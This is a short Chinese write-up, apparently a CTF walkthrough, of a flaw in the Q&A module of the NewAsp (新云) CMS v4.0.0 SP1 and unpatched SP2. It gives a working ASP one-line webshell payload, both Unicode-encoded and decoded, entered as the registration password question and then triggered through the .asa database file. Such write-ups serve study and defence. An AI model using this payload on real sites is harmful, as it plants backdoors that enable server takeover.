本文探讨新云网站内容管理系统v4.0.0 SP1及未打补丁SP2的问吧系统中存在的一处安全漏洞。由于过滤不严,攻击者可利用Unicode转码插入一句话木马,获取webshell。通过注册账户并设置特殊密码问题,一句话木马成功插入数据库。随后,通过访问ask_newasp.asa文件,确认木马已生效。
新云网站内容管理系统是一套开源的WEB网站管理系统,采用目前非常成熟的ASP+Access/SQL开发而成。使用它,我们可以很方便的管理自己的网站,目前新云网站内容管理系统最新的版本是v4.0.0 SP2。本文要介绍的捕洞就出在新云网站内容管理系统v4.0.0 SP1以及未打官方最新补丁的v4.0.O SP2的问吧系统中。
新云的问吧是类似百度知道的互动知识问答分享平台,问吧采用自己的数据库,数据库文件为.asa格式,由于过滤不严,导致可以向数据库中插入一句话木马,从而拿到webshell。
题目给出提示得到
自然,注册账户
但“密码问题”需要特别注意,要填写 ┼攠數畣整爠煥敵瑳∨≡┩愾
也就是<% execute request("a")%>a经过Unicode转码后的代码。
注册信息全部填写完毕后点“立即注册”按钮,注册成功后我们的一句话木马就插入到数据库中了
问吧数据库的默认地址是问吧耳录下的data目录下的ask_newasp.asa,直接在浏览器中访问,看到了数据库的代码,拉到网页最下面,看到了熟悉的“类型不匹配:'execute'”,说明一句话木马已经成功的插入到数据库中了。
最低0.47元/天 解锁文章
955
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
